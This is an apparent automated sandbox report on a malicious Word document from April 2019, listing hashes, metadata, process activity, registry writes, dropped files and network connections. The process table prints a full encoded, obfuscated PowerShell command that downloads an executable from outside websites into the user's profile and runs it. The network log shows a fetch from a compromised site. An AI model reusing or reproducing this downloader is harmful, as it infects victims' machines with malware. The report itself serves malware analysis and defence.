File name: | _wA14B_.doc |
Full analysis: | https://app.any.run/tasks/ef46968c-96b2-4412-8c83-55028d67d2d1 |
Verdict: | Malicious activity |
Analysis date: | April 15, 2019, 13:59:16 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Apr 11 15:13:00 2019, Last Saved Time/Date: Thu Apr 11 15:13:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 7, Security: 0 |
MD5: | 73B64833C9635C4663980157CFBEB57E |
SHA1: | A1B01160E46F2DE6BE42B18E190C409D440CE5B8 |
SHA256: | 4C7B0B5822F8CD27A1EA3AC6BA131D5D1084EEB50AE311721024BEFDF5591506 |
SSDEEP: | 3072:L4eOY5CTsdAORqsfRa5y2585vjVhjU7J/FszYp+rLCU/:LTbw58fBCJ/FsnLCU/ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 7 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 7 |
Words: | 1 |
Pages: | 1 |
ModifyDate: | 2019:04:11 14:13:00 |
CreateDate: | 2019:04:11 14:13:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1248 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\_wA14B_.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2240 | PoWeRsHelL -e JABhAGsAUQB4AEEAXwB4AD0AKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBMAEEAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAEQAXwAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBCACcALAAnAFoAbwBRACcAKQApACkAOwAkAFkAQgBBAEEAMQAxAFUAIAA9ACAAJwA0ADUANAAnADsAJABDAEEARABfAEIAQwBEAD0AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAJwBIAEEAXwAnACwAJwBfACcALAAnAEEAbwBVACcAKQA7ACQARwBBAGMAQQBHAHgAMQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAWQBCAEEAQQAxADEAVQArACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAZQB4AGUAJwAsACcALgAnACkAOwAkAEwAWgBBAEEAQQBBAD0AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAGYAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBBAFUAQQAnACwAJwBBACcAKQAsACcAQgAnACkAKQA7ACQASgBrAFEANAB3AFEAQQBRAD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagBlACcAKwAnAGMAdAAnACkAIABuAGUAYABUAGAALgB3AEUAYABCAGMAbABpAGUATgB0ADsAJABYAHcAVQBBAEEAdwBEAD0AKAAiAHsAMwB9AHsAMgA3AH0AewAxADEAfQB7ADAAfQB7ADEAMwB9AHsAMwA3AH0AewAzADIAfQB7ADQAfQB7ADMAOQB9AHsAMwA1AH0AewAyADQAfQB7ADMAOAB9AHsAMgAxAH0AewAxADgAfQB7ADIANQB9AHsAMQAwAH0AewAzADAAfQB7ADYAfQB7ADIAfQB7ADEAOQB9AHsAMgA5AH0AewAyADYAfQB7ADIAMwB9AHsAMwAxAH0AewA4AH0AewAxADUAfQB7ADEANAB9AHsANAAxAH0AewAzADMAfQB7ADQAMAB9AHsAMgAyAH0AewA1AH0AewAzADQAfQB7ADEANwB9AHsAMQAyAH0AewAyADgAfQB7ADEAfQB7ADMANgB9AHsAOQB9AHsANwB9AHsAMQA2AH0AewAyADAAfQAiAC0AZgAnAGwAJwAsACcALgAyADEAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcALwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAC8AJwAsACcAdABwADoAJwApACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAaAB0ACcALAAnAHQAcAA6ACcAKQAsACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAbwBkACcALAAnAHUAbAAnACkALAAnAC8AbQAnACwAJwB0AG8AcgAnACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAGkAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAG8AbgAtACcALAAnAHoAJwApACkALAAnAGgAdAAnACwAKAAiAHsAMAB9AHsANgB9AHsAMQB9AHsAMwB9AHsANQB9AHsAMgB9AHsANAB9ACIALQBmACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAOAAnACwAJwA6ADgAMAAnACkALAAnAHMANAAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAdwAnACwAJwBMAHIAcQBaAEwAZQA4ACcAKQAsACcANwA4ACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnADkAMAB5ACcALAAnAHgAJwApACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBvAFYATQAnACwAJwBMACcAKQAsACcAMAAvAGUAJwApACwAJwByAGEAJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACcANQAnACwAJwAxADMAJwAsACcAMAAuADIAJwApACwAJwB0AC4AZQAnACwAJwBmAGEAYwAnACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAHgAZQBAACcALAAnAGgAJwApACwAJwBlACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAG4AdAAuACcALAAnAHQAZQAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAaQBuAGkAJwAsACcAYwAnACkALAAoACIAewAyAH0AewA0AH0AewAxAH0AewAwAH0AewAzAH0AIgAtAGYAJwByAGkAdgAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBvAG0AJwAsACcAXwBwACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAG4AZQBuACcALAAnAG8AJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcALwBjAG8AbgB0AHIAJwAsACcAYQBjAHkAJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAcwAvAGMAJwAsACcAdAAnACkAKQAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACAAJwB0ACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHAAJwAsACcAYwBvAG0AJwApACwAJwBvAHIALwAnACkALAAnADMAJwAsACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAC4AYwBvACcALAAnAC0AMgAnACwAJwBuACcAKQAsACcAdAAnACwAJwBqACcALAAnAGMANQAnACwAKAAiAHsAMQB9AHsAMAB9AHsAMwB9AHsAMgB9ACIALQBmACAAJwBsACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBpAGwAJwAsACcALQBiACcAKQAsACcAbwBuACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwAxAC4AYwAnACwAJwAtACcAKQApACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwAvAHYAJwAsACcAZQByACcAKQAsACcAcgB5AC4AJwAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiAC0AZgAnAC8AbAAnACwAJwBhAG4AJwAsACcAZwB1ACcAKQAsACcAZQBuACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBlACcALAAnAGUAbQBvACcAKQAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACcALwAnACwAJwAvAGMAaAAnACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHMAaABpACcALAAnAHQAeQAnACwAJwBpAHMAJwApACkALAAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAJwBwADoALwAnACwAJwB0AHQAJwAsACcALwA4ADAAJwApACwAJwBhAHkAZAAnACwAJwB4AGUAQAAnACwAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACcAYwAnACwAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAJwBvAG0ALwAnACwAJwBkAG0AaQBuACcALAAnAGEAJwApACwAJwBpAHMAdAAnACkALAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBzAHQAcgAnACwAJwBtAGkAbgBpACcAKQAsACcAYQAnACwAJwBkACcAKQAsACcAbAAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAaQBsAGwAJwAsACcAYgAnACkALAAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAnAGEAbgAnACwAJwB1AHMAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHMAdABhAHQAJwAsACcAZwAnACkAKQAsACcAMQAuADIAJwAsACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACcALwBhACcALAAnAG0AJwAsACcALgBjAG8AJwApACwAKAAiAHsAMwB9AHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBuACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAegBvACcALAAnAHIAaQAnACkALAAnAC8AdgBlACcALAAnAGEAZwBlACcAKQAsACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQAiAC0AZgAnAHQAaQAnACwAJwBtAHUAbAAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBlAHMALwBtAG8AZAAnACwAJwBfACcAKQAsACcAbAAnACkALAAnAGUAcgBzACcALAAnAG8AbAAnACkALgAiAHMAYABQAGwASQB0ACIAKAAnAEAAJwApADsAJABWAFgAUQBBAFgAbwA9ACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiACAALQBmACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBEACcALAAnAEEAYwBBACcAKQAsACcAbwA0AEIAJwAsACcAXwAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABBAEEAQQBBAEIAawBBAHcAIABpAG4AIAAkAFgAdwBVAEEAQQB3AEQAKQB7AHQAcgB5AHsAJABKAGsAUQA0AHcAUQBBAFEALgAiAGQAbwB3AGAATgBsAGAAbwBhAEQAZgBJAGwAZQAiACgAJABBAEEAQQBBAEIAawBBAHcALAAgACQARwBBAGMAQQBHAHgAMQApADsAJABMAEMAQwBBAEEAMQA0AD0AKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACAAJwBRACcALAAnAG4AJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAYwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEEAUQAnACwAJwBDAEEAJwApACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABHAEEAYwBBAEcAeAAxACkALgAiAEwARQBgAE4AYABHAHQASAAiACAALQBnAGUAIAAyADkAMwA1ADAAKQAgAHsALgAoACcASQBuACcAKwAnAHYAbwBrAGUALQAnACsAJwBJAHQAZQBtACcAKQAgACQARwBBAGMAQQBHAHgAMQA7ACQAUgBBAEQAawBVAF8ARwBfAD0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAIAAnAGoAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAQQBBADQAJwAsACcAWgBBACcAKQAsACcAYwBBACcAKQA7AGIAcgBlAGEAawA7ACQAWgBVAFUAUQA0AEEAPQAoACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAJwBaADEAJwAsACcARAAnACwAJwBvAEEAQQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHQAQQB3AEEAVQBBAFgAPQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAgAC0AZgAnAEEAQgAnACwAJwBOAFoARwAnACwAJwBBAFgAQgAnACkA | C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHelL.exe | WmiPrvSE.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3080 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | PoWeRsHelL.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (1248) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | sz4 |
Value: 737A3400E0040000010000000000000000000000 | |||
(PID) Process: | (1248) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (1248) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (1248) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1317994526 | |||
(PID) Process: | (1248) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1317994640 | |||
(PID) Process: | (1248) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1317994641 | |||
(PID) Process: | (1248) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: E004000084EAD77993F3D40100000000 | |||
(PID) Process: | (1248) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | w|4 |
Value: 777C3400E004000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (1248) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | w|4 |
Value: 777C3400E004000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (1248) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1248 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR66E3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2240 | PoWeRsHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ILXDDVQCS8G90K91FD1X.temp | — | |
MD5:— | SHA256:— | |||
3080 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs1757.tmp | — | |
MD5:— | SHA256:— | |||
3080 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs1758.tmp | — | |
MD5:— | SHA256:— | |||
1248 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:383A8130CDB60F3E4A95F367EFA53855 | SHA256:C7780AD65D218C93224BC5A09D31AD767AB3886D98949DB991C67CD57CCB6214 | |||
1248 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D2E15D5C604345F8015FBF3360A0E0AC | SHA256:1F21FE58E7748D2F29BC412D23F15565CB01B44D017CC45BB01701708A9978D6 | |||
2240 | PoWeRsHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
2240 | PoWeRsHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe779d.TMP | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
1248 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$wA14B_.doc | pgc | |
MD5:6FE1B71DE077F5CD7ED389F6628E0319 | SHA256:EAFF05C240197B3203ADAF8368CCC29A3740E6C68A292EE5BBA0D6DEBEFF3230 | |||
2240 | PoWeRsHelL.exe | C:\Users\admin\454.exe | html | |
MD5:3F6BB11DD1EF460042BAF2F5ACE022C6 | SHA256:E432165CDD35228FAAD8E8AC50BA40C95EA2BB499D431270A17F0D91D56DD4D3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2240 | PoWeRsHelL.exe | GET | — | 23.229.231.230:80 | http://chistyshifaclinic.com/administrator/modules/mod_multilangstatus/language/verizon-bill-1.content.exe | US | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2240 | PoWeRsHelL.exe | 23.229.231.230:80 | chistyshifaclinic.com | GoDaddy.com, LLC | US | unknown |
Domain | IP | Reputation |
---|---|---|
chistyshifaclinic.com |
| unknown |